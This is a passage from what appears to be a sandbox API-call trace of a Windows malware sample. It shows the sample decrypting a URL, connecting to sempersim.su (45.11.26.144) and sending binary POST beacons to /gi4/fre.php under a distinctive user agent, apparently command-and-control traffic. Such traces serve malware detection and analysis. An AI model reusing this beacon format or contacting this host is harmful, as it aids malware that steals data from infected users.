szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0246.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.662] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0246.669] GetProcessHeap () returned 0x5b0000 [0246.669] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0246.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.670] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0246.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.675] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0246.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.676] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.676] GetProcessHeap () returned 0x5b0000 [0246.676] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0246.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.677] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0246.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.679] CryptDestroyKey (hKey=0x5bde08) returned 1 [0246.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.680] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0246.680] GetProcessHeap () returned 0x5b0000 [0246.680] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0246.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.681] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0246.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.682] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0246.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.684] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0246.684] GetProcessHeap () returned 0x5b0000 [0246.684] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0246.684] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0246.689] GetProcessHeap () returned 0x5b0000 [0246.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0246.690] socket (af=2, type=1, protocol=6) returned 0x380 [0246.690] connect (s=0x380, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0246.762] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0246.763] GetProcessHeap () returned 0x5b0000 [0246.763] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0246.763] GetProcessHeap () returned 0x5b0000 [0246.763] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0246.764] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0246.765] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0246.765] GetProcessHeap () returned 0x5b0000 [0246.765] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0246.765] GetProcessHeap () returned 0x5b0000 [0246.766] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0246.766] GetProcessHeap () returned 0x5b0000 [0246.766] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3080 [0246.766] GetProcessHeap () returned 0x5b0000 [0246.766] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0246.767] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0246.768] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0246.768] GetProcessHeap () returned 0x5b0000 [0246.768] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0246.768] GetProcessHeap () returned 0x5b0000 [0246.768] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0246.768] send (s=0x380, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0246.769] send (s=0x380, buf=0x5d1e18*, len=159, flags=0) returned 159 [0246.769] GetProcessHeap () returned 0x5b0000 [0246.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0246.769] recv (in: s=0x380, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0247.906] GetProcessHeap () returned 0x5b0000 [0247.906] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0247.906] GetProcessHeap () returned 0x5b0000 [0247.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0247.907] GetProcessHeap () returned 0x5b0000 [0247.907] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0247.907] GetProcessHeap () returned 0x5b0000 [0247.908] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0247.908] closesocket (s=0x380) returned 0 [0247.908] GetProcessHeap () returned 0x5b0000 [0247.908] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0247.908] GetProcessHeap () returned 0x5b0000 [0247.908] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0247.909] GetProcessHeap () returned 0x5b0000 [0247.909] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0247.909] GetProcessHeap () returned 0x5b0000 [0247.909] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0247.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x85c) returned 0x380 [0247.911] Sleep (dwMilliseconds=0xea60) [0247.925] GetProcessHeap () returned 0x5b0000 [0247.925] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0247.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.926] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0247.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.932] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0247.942] GetProcessHeap () returned 0x5b0000 [0247.942] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0247.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.943] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0247.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.945] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0247.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.946] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.946] GetProcessHeap () returned 0x5b0000 [0247.946] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0247.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.947] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0247.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.948] CryptDestroyKey (hKey=0x5be048) returned 1 [0247.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0247.949] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0247.949] GetProcessHeap () returned 0x5b0000 [0247.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0247.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0247.950] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0247.951] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.037] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.038] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.038] GetProcessHeap () returned 0x5b0000 [0248.038] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0248.038] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0248.038] GetProcessHeap () returned 0x5b0000 [0248.039] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0248.039] GetProcessHeap () returned 0x5b0000 [0248.039] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0248.039] GetProcessHeap () returned 0x5b0000 [0248.039] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0248.039] GetProcessHeap () returned 0x5b0000 [0248.039] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0248.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.040] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0248.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.047] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0248.056] GetProcessHeap () returned 0x5b0000 [0248.056] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0248.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.057] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0248.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.058] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0248.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.059] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.059] GetProcessHeap () returned 0x5b0000 [0248.060] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0248.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.061] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0248.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.062] CryptDestroyKey (hKey=0x5bde08) returned 1 [0248.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0248.065] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0248.065] GetProcessHeap () returned 0x5b0000 [0248.065] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0248.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.066] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0248.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.067] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0248.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.068] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0248.068] GetProcessHeap () returned 0x5b0000 [0248.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0248.068] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0248.070] GetProcessHeap () returned 0x5b0000 [0248.071] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0248.071] socket (af=2, type=1, protocol=6) returned 0x384 [0248.071] connect (s=0x384, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0248.143] FreeAddrInfoW (pAddrInfo=0x5ce128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0248.143] GetProcessHeap () returned 0x5b0000 [0248.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0248.143] GetProcessHeap () returned 0x5b0000 [0248.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0248.144] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0248.144] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0248.145] GetProcessHeap () returned 0x5b0000 [0248.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0248.145] GetProcessHeap () returned 0x5b0000 [0248.145] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0248.145] GetProcessHeap () returned 0x5b0000 [0248.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0248.145] GetProcessHeap () returned 0x5b0000 [0248.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0248.146] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0248.147] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0248.147] GetProcessHeap () returned 0x5b0000 [0248.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0248.147] GetProcessHeap () returned 0x5b0000 [0248.147] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0248.147] send (s=0x384, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0248.148] send (s=0x384, buf=0x5d1e18*, len=159, flags=0) returned 159 [0248.148] GetProcessHeap () returned 0x5b0000 [0248.148] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0248.148] recv (in: s=0x384, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0249.380] GetProcessHeap () returned 0x5b0000 [0249.380] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0249.380] GetProcessHeap () returned 0x5b0000 [0249.380] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0249.380] GetProcessHeap () returned 0x5b0000 [0249.381] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0249.381] GetProcessHeap () returned 0x5b0000 [0249.381] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0249.381] closesocket (s=0x384) returned 0 [0249.382] GetProcessHeap () returned 0x5b0000 [0249.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0249.382] GetProcessHeap () returned 0x5b0000 [0249.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0249.382] GetProcessHeap () returned 0x5b0000 [0249.383] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0249.383] GetProcessHeap () returned 0x5b0000 [0249.383] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0249.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb58) returned 0x384 [0249.385] Sleep (dwMilliseconds=0xea60) [0249.390] GetProcessHeap () returned 0x5b0000 [0249.390] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0249.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.391] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0249.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.398] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0249.408] GetProcessHeap () returned 0x5b0000 [0249.409] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0249.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.410] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0249.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.410] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0249.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.411] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.411] GetProcessHeap () returned 0x5b0000 [0249.412] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0249.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.413] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0249.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.414] CryptDestroyKey (hKey=0x5bde08) returned 1 [0249.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.415] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0249.415] GetProcessHeap () returned 0x5b0000 [0249.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0249.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.416] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.416] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.417] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.418] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.418] GetProcessHeap () returned 0x5b0000 [0249.418] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0249.418] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0249.419] GetProcessHeap () returned 0x5b0000 [0249.419] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0249.419] GetProcessHeap () returned 0x5b0000 [0249.420] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0249.420] GetProcessHeap () returned 0x5b0000 [0249.420] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0249.420] GetProcessHeap () returned 0x5b0000 [0249.420] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0249.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.427] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0249.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.432] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0249.440] GetProcessHeap () returned 0x5b0000 [0249.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0249.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.441] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0249.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.441] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, 